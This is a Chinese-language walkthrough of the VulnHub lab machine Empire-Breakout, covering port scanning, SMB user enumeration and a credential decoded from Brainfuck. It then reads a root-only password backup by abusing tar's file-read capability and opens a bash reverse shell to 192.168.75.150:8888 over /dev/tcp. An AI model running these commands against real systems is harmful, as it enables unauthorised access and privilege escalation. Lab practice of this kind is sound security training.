Empire-Breakout

NoCirc1e發表於2024-05-05

靶機描述

靶機地址:https://www.vulnhub.com/entry/empire-breakout,751/

Description

Difficulty: Easy
This box was created to be an Easy box, but it can be Medium if you get lost.
For hints discord Server ( https://discord.gg/7asvAhCEhe )

資訊收集

arp-scan -l

image.png
檢視靶機開放的埠,發現80、139、445、10000、20000埠

nmap -A -sV -T4 -p- 192.168.75.163

image.png
訪問一下80埠
image.png
在頁面原始碼的最底部發現了加密字串
image.png
image.png
Brainfuck編碼進行解密
image.png
應該是一個密碼,先記錄下來,接著我們繼續檢視10000和20000埠
image.png
image.png

漏洞利用

之前nmap掃描出來靶機系統裝了Samba,所以用Enum4linux掃描一下SMB 伺服器中的使用者

enum4linux 192.168.75.163

image.png
使用者名稱:cyber
密碼:.2uqPEfj3D<P'a-3
20000埠登陸成功
image.png
左下角發現了類似Windows PowerShell的圖示
image.png
我們可以找到第一個flag
image.png

提權

除user.txt,還發現一個tar檔案,檢視一下檔案的相關屬性
image.png
發現有cap_dac_read_search=ep功能,能讀取檔案

有關linux setcap命令的資訊,參考部落格:
https://blog.csdn.net/megan_free/article/details/100357702

然後在/var/backups目錄下發現了一個密碼備份檔案
image.png
只能root使用者讀取,不過之前發現tar可以讀取任意檔案,那就用tar讀取檔案

./tar -cvf pass.tar /var/backups/.old_pass.bak

tar -xvf pass.tar

獲取root密碼
image.png
使用反彈shell切換root

bash -i >& /dev/tcp/192.168.75.150/8888 0>&1

image.png
image.png
使用python切換互動式shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

獲取最終的flag
image.png